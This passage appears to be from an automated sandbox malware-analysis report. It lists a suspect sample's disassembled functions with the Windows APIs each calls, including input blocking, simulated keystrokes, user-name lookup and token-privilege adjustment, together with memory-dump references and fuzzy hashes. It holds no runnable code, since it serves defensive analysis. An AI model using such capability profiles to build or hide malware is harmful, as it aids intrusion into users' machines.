                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00D74CBE,00D828E9,00E188B8,0000000C,00D74E15,00D828E9,00000002,00000000,?,00D828E9), ref: 00D74D10
                                                                                                            • ExitProcess.KERNEL32 ref: 00D74D22
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1703294689-0
                                                                                                            • Opcode ID: 7dd82f67e221404b1878c26a0f888dd7db7aaaa1d6d55b8675c18b5a19b801ef
                                                                                                            • Instruction ID: 4734078ddefad4d6491f48c06c1458c466f1ee66d9b878a8f78d2e27fafd2fd1
                                                                                                            • Opcode Fuzzy Hash: 7dd82f67e221404b1878c26a0f888dd7db7aaaa1d6d55b8675c18b5a19b801ef
                                                                                                            • Instruction Fuzzy Hash: 28E0B631010288AFCF22BF54DD5AA583B69EB41791B158014FC59DA222EB35ED52CBB0
                                                                                                            Function 00DAD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 00DAD28C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: NameUser
                                                                                                            • String ID: X64
                                                                                                            • API String ID: 2645101109-893830106
                                                                                                            • Opcode ID: 9af54b5871fab31bb29f20f244df06936715c9159524c910b2510a42ec45dd34
                                                                                                            • Instruction ID: 1f330e1a57560ef7dc21b29dfce1c278b48b929c4daa453d918ab29b4ec5a46d
                                                                                                            • Opcode Fuzzy Hash: 9af54b5871fab31bb29f20f244df06936715c9159524c910b2510a42ec45dd34
                                                                                                            • Instruction Fuzzy Hash: 1FD0C9B491111DEBCB90DB90ECC8DD9B37CBB04305F100551F546E2100D73095498F30
                                                                                                            Function 00D7CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                            • Instruction ID: b1bfa24fcb2e2543fe3291a0b9f988ddbe2405106c9f644287c872fa9b47ad27
                                                                                                            • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                            • Instruction Fuzzy Hash: 49022F71E111199FDF24CFA9C8806ADFBF1EF48314F29816EE919E7380E731A9418B94
                                                                                                            Function 00D5CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Variable is not of type 'Object'.$p#
                                                                                                            • API String ID: 0-1086706999
                                                                                                            • Opcode ID: 1f9d0d4096a70f74753305392d370db252fb0478e7209be6f42cd80155cb31c7
                                                                                                            • Instruction ID: 5c5f133d5cf035e208f020c383d727917988f5f39e384812b33e02e39c0124bb
                                                                                                            • Opcode Fuzzy Hash: 1f9d0d4096a70f74753305392d370db252fb0478e7209be6f42cd80155cb31c7
                                                                                                            • Instruction Fuzzy Hash: AC3256709102189FCF14DF94C881AEDBBB5EF05305F18905AEC46AB292DB75AE4ACB71
                                                                                                            Function 00DC68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00DC6918
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00DC6961
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 2295610775-0
                                                                                                            • Opcode ID: 2686a08e82bce30e27528d3d4c15ca850becaa875a17c40b946ef1aee864800d
                                                                                                            • Instruction ID: aa6d0a55f16035429d5efffcb5e97a2f47fbdd2359b4e1d182f670cd7ee19819
                                                                                                            • Opcode Fuzzy Hash: 2686a08e82bce30e27528d3d4c15ca850becaa875a17c40b946ef1aee864800d
                                                                                                            • Instruction Fuzzy Hash: 29117F716142019FC710DF69D885A16BBE5EF85329F14C69DE9698F2A2CB30EC05CBA1
                                                                                                            Function 00DC37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00DD4891,?,?,00000035,?), ref: 00DC37E4
                                                                                                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00DD4891,?,?,00000035,?), ref: 00DC37F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFormatLastMessage
                                                                                                            • String ID:
                                                                                                            • API String ID: 3479602957-0
                                                                                                            • Opcode ID: f907c757f0e12cec95bdf99095ae12b4c906f4bc2ab6ff8eab73029142e1c328
                                                                                                            • Instruction ID: 57ed6b71bbd5dc0797637665dc8c1f2ab1dc3fce239f547d292bf7c74f2e87df
                                                                                                            • Opcode Fuzzy Hash: f907c757f0e12cec95bdf99095ae12b4c906f4bc2ab6ff8eab73029142e1c328
                                                                                                            • Instruction Fuzzy Hash: 07F0E5B16043296AEB2027A68C8DFEB7AAEEFC5761F000165F909D32D1D9709904C7B0
                                                                                                            Function 00DBB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00DBB25D
                                                                                                            • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00DBB270
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InputSendkeybd_event
                                                                                                            • String ID:
                                                                                                            • API String ID: 3536248340-0
                                                                                                            • Opcode ID: 1544ecc531b9390d4b1085b884bdd16c6760563fa0684d67f52097c7a683bf5e
                                                                                                            • Instruction ID: a3c2bb81ec2a8d0c8a50f270d081620bde491622672fe1507aa4f1d0f74ac00f
                                                                                                            • Opcode Fuzzy Hash: 1544ecc531b9390d4b1085b884bdd16c6760563fa0684d67f52097c7a683bf5e
                                                                                                            • Instruction Fuzzy Hash: F3F01D7181438DABDB059FA1C805BEE7BB4FF04315F04900AF966A9191C379C6129FA4
                                                                                                            Function 00DB10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DB11FC), ref: 00DB10D4
                                                                                                            • CloseHandle.KERNEL32(?,?,00DB11FC), ref: 00DB10E9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 81990902-0
                                                                                                            • Opcode ID: 571b9902c9c5adb2ffd8003b31cc667d7f5a2904442ca9a43238531f2fe2f04f
                                                                                                            • Instruction ID: dcaf265b821a2ba16a76149a670b41f8087a88271cdfca38010c91cca0a2e71f
                                                                                                            • Opcode Fuzzy Hash: 571b9902c9c5adb2ffd8003b31cc667d7f5a2904442ca9a43238531f2fe2f04f
                                                                                                            • Instruction Fuzzy Hash: 08E04F32014700EFE7252B11FC05E737BA9FB04310B14882EF4A6844B1DB626C90DB30
                                                                                                            Function 00D8676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D86766,?,?,00000008,?,?,00D8FEFE,00000000), ref: 00D86998
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionRaise
                                                                                                            • String ID:
                                                                                                            • API String ID: 3997070919-0
                                                                                                            • Opcode ID: 630bbe5b8604bd69d45985570710c4b476ae09e0cc96db20e4c6cf72ea838591
                                                                                                            • Instruction ID: 4ec01136d24071a49915204d6455ca6eca083235b9aae7145f40535c861ab8b9
                                                                                                            • Opcode Fuzzy Hash: 630bbe5b8604bd69d45985570710c4b476ae09e0cc96db20e4c6cf72ea838591
                                                                                                            • Instruction Fuzzy Hash: 8FB12731610608DFD719DF28C48AB657BA0FF45364F298658E8EACF2E2C735E991CB50
                                                                                                            Function 00D6B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID: 0-3916222277
                                                                                                            • Opcode ID: 7956f754e483858b17bb54806bc12f7305e5dfcfa28cfe6a5b660e9bb6578215
                                                                                                            • Instruction ID: fe5f3b4877d3b97fa33edf85da543f9c77aa4cdbd5346a96955151f2a2562861
                                                                                                            • Opcode Fuzzy Hash: 7956f754e483858b17bb54806bc12f7305e5dfcfa28cfe6a5b660e9bb6578215
                                                                                                            • Instruction Fuzzy Hash: BF123071D002299FDB24DF58C8806AEB7F5FF49710F14819AE849EB255EB349A81DFA0
                                                                                                            Function 00DCEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • BlockInput.USER32(00000001), ref: 00DCEABD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BlockInput
                                                                                                            • String ID:
                                                                                                            • API String ID: 3456056419-0
                                                                                                            • Opcode ID: e13efce41dfb24d324dcb6cf54fc99baa130f13a19c7f8219181349b51ec4560
                                                                                                            • Instruction ID: a6181240a5e1722365a5b62ff94e29aaefc848296922ce0f431697dfd3e66159
                                                                                                            • Opcode Fuzzy Hash: e13efce41dfb24d324dcb6cf54fc99baa130f13a19c7f8219181349b51ec4560
                                                                                                            • Instruction Fuzzy Hash: F5E01A712102059FC710EF69D844E9AB7E9EF98760F00841AFC49CB361DA70E8458BB0
                                                                                                            Function 00D709D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00D703EE), ref: 00D709DA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192549508-0
                                                                                                            • Opcode ID: 1dc1b269eb96b91a5f9ddd88ad970df37d133df3b179bb78e8b378e348d198a6
                                                                                                            • Instruction ID: 2e509bf343e71a02aa2c695c7bdab33ce609e5e65a959463c09a9d9adcac4d81
                                                                                                            • Opcode Fuzzy Hash: 1dc1b269eb96b91a5f9ddd88ad970df37d133df3b179bb78e8b378e348d198a6
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Function 00D7781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 0-4108050209
                                                                                                            • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                            • Instruction ID: 7849803d48e115a792cd99507e97bd5f1208e6aa11246358c65b3d1e861c3e6d
                                                                                                            • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                            • Instruction Fuzzy Hash: 4E51327160C705AADB388568C85EBBE6399DB02300F1CCD1AD98EC7282F611DE01E7B3
                                                                                                            Function 00DC2046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0&
                                                                                                            • API String ID: 0-2523485602
                                                                                                            • Opcode ID: 5cb5c1f2c6a7e1eda798c3d8390170284d7ed8fa7785d2c6bf1a985b76205673
                                                                                                            • Instruction ID: fdb41a9707f9be9459b7190992db20242f59c9d82857e2bcfc6afebd2625650b
                                                                                                            • Opcode Fuzzy Hash: 5cb5c1f2c6a7e1eda798c3d8390170284d7ed8fa7785d2c6bf1a985b76205673
                                                                                                            • Instruction Fuzzy Hash: 0E21B7327206118BD728CF79C82367E73E5A754310F19862EE4A7D77D1DE35A904DB90
                                                                                                            Function 00D86DD9 Relevance: .6, Instructions: 637COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3a9f007d86b4316014f52f3ffa37c1c668590fcdc997a583f3a57ff91324a5aa
                                                                                                            • Instruction ID: f2f79a75662dec92e8b0a564b88d68f7c75f3706836f57c64b47cf6a78d0c7f1
                                                                                                            • Opcode Fuzzy Hash: 3a9f007d86b4316014f52f3ffa37c1c668590fcdc997a583f3a57ff91324a5aa
                                                                                                            • Instruction Fuzzy Hash: 74323821D29F014DD723A638DC22335A649AFB73C5F25D737F81AF5AA5EB29C4838210
                                                                                                            Function 00D6CC39 Relevance: .6, Instructions: 635COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f6f5bb7fbcf155606d2ea05084c802451d82036c653d0bfec037af0799b6fc94
                                                                                                            • Instruction ID: 9eb10787d6cf286e507360ad8b5963a915365db0100f6b290da32450ab54fed0
                                                                                                            • Opcode Fuzzy Hash: f6f5bb7fbcf155606d2ea05084c802451d82036c653d0bfec037af0799b6fc94
                                                                                                            • Instruction Fuzzy Hash: 3E322631A241158BCF28CF2DC4906BD7BA1EF86320F2DA56AD4DA9B291D334DD81DB71
                                                                                                            Function 00D57920 Relevance: .6, Instructions: 563COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 56dbf1673c5193c3b3776b73898c20549eab0e636ddf929622c6dea4520bfd97
                                                                                                            • Instruction ID: 7cfa0a1a8fafa6bc541b3ac702bce74b97dbd46447df0eff2e9ea648ab000623
                                                                                                            • Opcode Fuzzy Hash: 56dbf1673c5193c3b3776b73898c20549eab0e636ddf929622c6dea4520bfd97
                                                                                                            • Instruction Fuzzy Hash: 02229EB0A00609DFDF14CF64E881AAEB7B5FF44301F244629EC56A7295EB36E914CB70
                                                                                                            Function 00D591C0 Relevance: .5, Instructions: 475COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
